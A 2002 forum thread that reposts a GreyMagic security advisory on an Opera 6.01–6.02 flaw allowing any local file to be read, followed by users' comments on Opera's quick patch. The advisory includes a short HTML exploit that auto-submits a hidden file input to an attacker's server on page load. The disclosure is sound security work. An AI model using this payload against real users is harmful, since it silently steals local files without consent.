|
-
May 28th, 2002, 06:40 AM
#1
Opera: Reading ANY local file.
Time to upgrade, again?
GreyMagic Security Advisory GM#001-OP
By GreyMagic Software, Israel.
27 May 2002. Topic: Reading ANY local file in Opera.
Discovery date: 07 May 2002.
Affected applications:
Opera 6.01 on Windows platforms.
Opera 6.02 on Windows platforms.
Exploit:
This exploit will automatically transfer the file "c:/test.txt" to an attacking host, which can handle it using a server-side environment such as ASP, PHP or other solutions. It does not require any user interaction:
Code:
<body onload="document.secForm.submit()">
<form method="post" enctype="multipart/form-data" action="recFile.php" name="secForm">
<input type="file" name="expFile" value="c:\test.txt
" style="visibility:hidden">
</form>
</body>
Solution:
Opera was informed on 15 May 2002 and confirmed our findings. A day later, in the evening of 16 May 2002, Opera informed us that the vulnerability was fixed and committed to Opera's own version control system. On 27 May 2002, Opera released version 6.03, which addressed this issue. Opera has been extremely responsive and quick to understand and patch this vulnerability. They have shown that they truly do take security seriously.
The rest of the article can be found here.
-
May 28th, 2002, 06:52 AM
#2
Hehe...kool, thanks for this Micael. Less then two hours ago, I just downloaded Opera 6.02, cos I only found out today that they had released a new version. Now I'm downloading 6.03...
But yeah, it's good that they have responded so quickly with an updated new version that takes care of the vulnerability. It's good to see.
Greg
\"Do you know what people are most afraid of?
What they don\'t understand.
When we don\'t understand, we turn to our assumptions.\"
-- William Forrester
-
May 28th, 2002, 06:56 AM
#3
Damit...I was about to post this...Oh well,
Yea it is nice to see that Opera does know that security is a must.
I would like to see microsoft come out with a patch that works a day later.
Violence breeds violence
we need a world court
not a republican with his hands covered in oil and military hardware lecturing us on world security!
-
May 28th, 2002, 07:04 AM
#4
I would like to see microsoft come out with a patch that works a day later.
This would seriously be an impossible task. If they were to fix a bug in every release they made they day after they released it, we would have a NEVER ending cycle of releases.
IE 6.01, IE 6.02, IE 6.03, ..., IE 6.0365 - that would be one year's worth.
Greg
\"Do you know what people are most afraid of?
What they don\'t understand.
When we don\'t understand, we turn to our assumptions.\"
-- William Forrester
-
May 28th, 2002, 07:26 AM
#5
grr.. why can we just download a patch instead of the whole version?? its gettin annoying
-
May 28th, 2002, 08:27 AM
#6
True, an incremental patch would be nice. And although a bug was found that seems potentially serious, I think the fact that a new version exists so quickly is definitely good.
[HvC]Terr: L33T Technical Proficiency
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|
Reply With Quote
